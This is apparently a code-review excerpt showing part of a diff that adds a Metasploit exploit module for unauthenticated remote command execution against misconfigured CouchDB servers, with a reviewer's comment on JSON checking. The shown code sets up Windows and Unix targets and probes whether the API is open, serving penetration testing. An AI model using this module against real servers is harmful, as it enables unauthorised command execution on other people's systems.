modules/exploits/multi/http/couchdb_unauth_exec.rb

```diff
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CouchDB Unauthentication Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a misconfiguration in CouchDB. If CouchDB api
+        without authentication, attackers can execute os commands with
+        the query_servers option in local.ini.
+      },
+      'Author'         => [
+        'Nixawk', # original metasploit module
+       ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://blog.rot13.org/2010/11/triggers-in-couchdb-from-queue-to-external-command-execution.html' ],
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
+        ],
+      'Platform'       => %w{ unix win },
+      'Targets'        =>
+        [
+          [ 'Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs' }],
+          [ 'Unix',    { 'Arch' => ARCH_CMD, 'Platform' => 'unix' }]
+        ],
+      'DisclosureDate' => 'Nov 23 2010',
+      'DefaultTarget'  => 1
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(5984),
+        OptString.new('TARGETURI', [ true, 'The path to a default couchDB api', '/'])
+      ], self.class)
+  end
+
+  def valid_json?(json)
+    begin
+      JSON.parse(json)
+      return true
+    rescue JSON::ParserError
+      return false
+    end
+  end
+
+  def unauth?
+    uri = normalize_uri(datastore['TARGETURI'])
+    resp = send_request_cgi(
+      'uri'     =>  uri,
+      'method'  => 'GET'
+    )
+
+    resp && resp.code == 200 && resp.body.include?("couchdb") && valid_json?(resp.body)
```

Comment:
I don't know if this is appropriate for your use case, but you can do ```resp.get_json_document.empty?``` to see if the content is json or not.